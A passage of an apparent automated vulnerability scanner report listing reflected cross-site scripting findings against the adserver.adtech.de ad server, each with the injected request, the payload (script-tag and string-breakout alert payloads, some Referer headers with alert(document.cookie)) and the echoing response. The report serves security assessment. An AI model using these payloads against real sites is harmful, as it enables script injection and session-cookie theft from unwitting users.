User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 263

<html><body><base target=9f878><script>alert(1)</script>1985d9d85ae><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn|2.0|277|75593|1|246|target=9f878><script>a
...[SNIP]...

2.6. http://adserver.adtech.de/ [adiframe|2.0|277|75593|1|246|target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /

Issue detail

The value of the adiframe|2.0|277|75593|1|246|target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a546f"><script>alert(1)</script>9db0ee5cd0e was submitted in the adiframe|2.0|277|75593|1|246|target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?adiframe|2.0|277|75593|1|246|target=_blank;a546f"><script>alert(1)</script>9db0ee5cd0e HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 235

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn|2.0|277|75593|1|246|target=_blank;a546f"><script>alert(1)</script>9db0ee5cd0e;adiframe=y">
...[SNIP]...

2.7. http://adserver.adtech.de/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 764c9"><script>alert(1)</script>3b8de120b8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?adiframe|2.0|277|75593|1|246|target=_blank;&764c9"><script>alert(1)</script>3b8de120b8c=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 238

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn|2.0|277|75593|1|246|target=_blank;&764c9"><script>alert(1)</script>3b8de120b8c=1;adiframe=y">
...[SNIP]...

2.8. http://adserver.adtech.de/addyn%7C2.0%7C277%7C75593%7C1%7C246%7Ctarget=_blank [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C2.0%7C277%7C75593%7C1%7C246%7Ctarget=_blank

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6238a'-alert(1)-'f9d6fc88a25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C2.0%7C277%7C75593%7C1%7C246%7Ctarget=_blank?6238a'-alert(1)-'f9d6fc88a25=1 HTTP/1.1
Host: adserver.adtech.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 276

document.write('<a href="http://adserver.adtech.de/?adlink|277|75593|1|246|AdId=-3;BnId=0;itime=507998761;" target=_blank?6238a'-alert(1)-'f9d6fc88a25=1><img src="http://aka-cdn-ns.adtech.de/images/AT
...[SNIP]...

2.9. http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ddee'-alert(1)-'ae3f639f0a7 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=8ddee'-alert(1)-'ae3f639f0a7 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=_blank;grp=9112943
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 579

document.write('<a href="http://adserver.adtech.de/?adlink|277|1028844|0|889|AdId=2172450;BnId=2;itime=507892681;" target=8ddee'-alert(1)-'ae3f639f0a7><img src="http://delivery-media.surftown.com/avw.
...[SNIP]...

2.10. http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ba5'-alert(1)-'dc232125ca4 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=86ba5'-alert(1)-'dc232125ca4 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=_blank;grp=9112943
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 300

document.write('<a href="http://adserver.adtech.de/?adlink|277|1028878|0|154|AdId=5633454;BnId=1;itime=507903153;" target=86ba5'-alert(1)-'dc232125ca4><img src="http://aka-cdn-ns.adtech.de/images/430/
...[SNIP]...

2.11. http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8360e'-alert(1)-'29e96183ae2 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=8360e'-alert(1)-'29e96183ae2 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=_blank;grp=9112943
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 304

document.write('<a href="http://adserver.adtech.de/?adlink|277|2144686|0|2130|AdId=2566839;BnId=53;itime=507918919;" target=8360e'-alert(1)-'29e96183ae2><img src="http://aka-cdn-ns.adtech.de/images/18
...[SNIP]...

2.12. http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 862c0'-alert(1)-'79cfb584069 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=862c0'-alert(1)-'79cfb584069 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=_blank;grp=9112943
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 301

document.write('<a href="http://adserver.adtech.de/?adlink|277|2144687|0|2130|AdId=2586667;BnId=4;itime=507916691;" target=862c0'-alert(1)-'79cfb584069><img src="http://aka-cdn-ns.adtech.de/images/43/
...[SNIP]...

2.13. http://adserver.adtech.de/addyn|2.0|277|75593|1|246|target=_blank [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|2.0|277|75593|1|246|target=_blank

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77cfd'-alert(1)-'c95538b025c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|2.0|277|75593|1|246|target=_blank?77cfd'-alert(1)-'c95538b025c=1 HTTP/1.1
Host: adserver.adtech.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 276

document.write('<a href="http://adserver.adtech.de/?adlink|277|75593|1|246|AdId=-3;BnId=0;itime=507995953;" target=_blank?77cfd'-alert(1)-'c95538b025c=1><img src="http://aka-cdn-ns.adtech.de/images/AT
...[SNIP]...

2.14. http://adserver.adtech.de/addyn|3.0|277|1028361|0|171|ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|277|1028361|0|171|ADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13e41'-alert(1)-'fbe60fa0e4a was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|277|1028361|0|171|ADTECH;target=13e41'-alert(1)-'fbe60fa0e4a HTTP/1.1
Host: adserver.adtech.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 300

document.write('<a href="http://adserver.adtech.de/?adlink|277|1028361|0|171|AdId=5855411;BnId=1;itime=507947702;" target=13e41'-alert(1)-'fbe60fa0e4a><img src="http://aka-cdn-ns.adtech.de/images/179/
...[SNIP]...

2.15. http://adserver.adtech.de/addyn|3.0|277|1028844|0|889|ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|277|1028844|0|889|ADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ae0e'-alert(1)-'ad1f7721bb8 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|277|1028844|0|889|ADTECH;target=3ae0e'-alert(1)-'ad1f7721bb8 HTTP/1.1
Host: adserver.adtech.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 578

document.write('<a href="http://adserver.adtech.de/?adlink|277|1028844|0|889|AdId=2172450;BnId=2;itime=507964729;" target=3ae0e'-alert(1)-'ad1f7721bb8><img src="http://delivery-media.surftown.com/avw.
...[SNIP]...

2.16. http://adserver.adtech.de/addyn|3.0|277|1028878|0|154|ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|277|1028878|0|154|ADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19364'-alert(1)-'41de7d250a3 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|277|1028878|0|154|ADTECH;target=19364'-alert(1)-'41de7d250a3 HTTP/1.1
Host: adserver.adtech.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 300

document.write('<a href="http://adserver.adtech.de/?adlink|277|1028878|0|154|AdId=5633454;BnId=1;itime=507987332;" target=19364'-alert(1)-'41de7d250a3><img src="http://aka-cdn-ns.adtech.de/images/430/
...[SNIP]...

2.17. http://adserver.adtech.de/addyn|3.0|277|2144686|0|2130|ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|277|2144686|0|2130|ADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15140'-alert(1)-'943d8807d0d was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|277|2144686|0|2130|ADTECH;target=15140'-alert(1)-'943d8807d0d HTTP/1.1
Host: adserver.adtech.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 304

document.write('<a href="http://adserver.adtech.de/?adlink|277|2144686|0|2130|AdId=2566839;BnId=52;itime=508013900;" target=15140'-alert(1)-'943d8807d0d><img src="http://aka-cdn-ns.adtech.de/images/18
...[SNIP]...

2.18. http://adserver.adtech.de/addyn|3.0|277|2144687|0|2130|ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|277|2144687|0|2130|ADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8e01'-alert(1)-'dd5813d7c1f was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|277|2144687|0|2130|ADTECH;target=e8e01'-alert(1)-'dd5813d7c1f HTTP/1.1
Host: adserver.adtech.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 301

document.write('<a href="http://adserver.adtech.de/?adlink|277|2144687|0|2130|AdId=2586667;BnId=4;itime=508002333;" target=e8e01'-alert(1)-'dd5813d7c1f><img src="http://aka-cdn-ns.adtech.de/images/43/
...[SNIP]...

2.19. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c5f3"><script>alert(1)</script>31251b41629 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH5c5f3"><script>alert(1)</script>31251b41629;target=_blank;grp=9112943 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 267

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH5c5f3"><script>alert(1)</script>31251b41629;target=_blank;grp=9112943;adiframe=y">
...[SNIP]...

2.20. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbfe9"><script>alert(1)</script>7414326b96b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH;target=_blank;grp=9112943&fbfe9"><script>alert(1)</script>7414326b96b=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 270

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH;target=_blank;grp=9112943&fbfe9"><script>alert(1)</script>7414326b96b=1;adiframe=y">
...[SNIP]...

2.21. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e61e7"><script>alert(1)</script>9b5044c0fa6 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH;target=_blank;grp=9112943e61e7"><script>alert(1)</script>9b5044c0fa6 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 267

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH;target=_blank;grp=9112943e61e7"><script>alert(1)</script>9b5044c0fa6;adiframe=y">
...[SNIP]...

2.22. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e5f71><script>alert(1)</script>8b855ad043f was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH;target=e5f71><script>alert(1)</script>8b855ad043f HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 284

<html><body><base target=e5f71><script>alert(1)</script>8b855ad043f><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH;t
...[SNIP]...

2.23. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cfc0"><script>alert(1)</script>08069858cfb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH4cfc0"><script>alert(1)</script>08069858cfb;target=_blank;grp=9112943 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 267

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH4cfc0"><script>alert(1)</script>08069858cfb;target=_blank;grp=9112943;adiframe=y">
...[SNIP]...

2.24. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
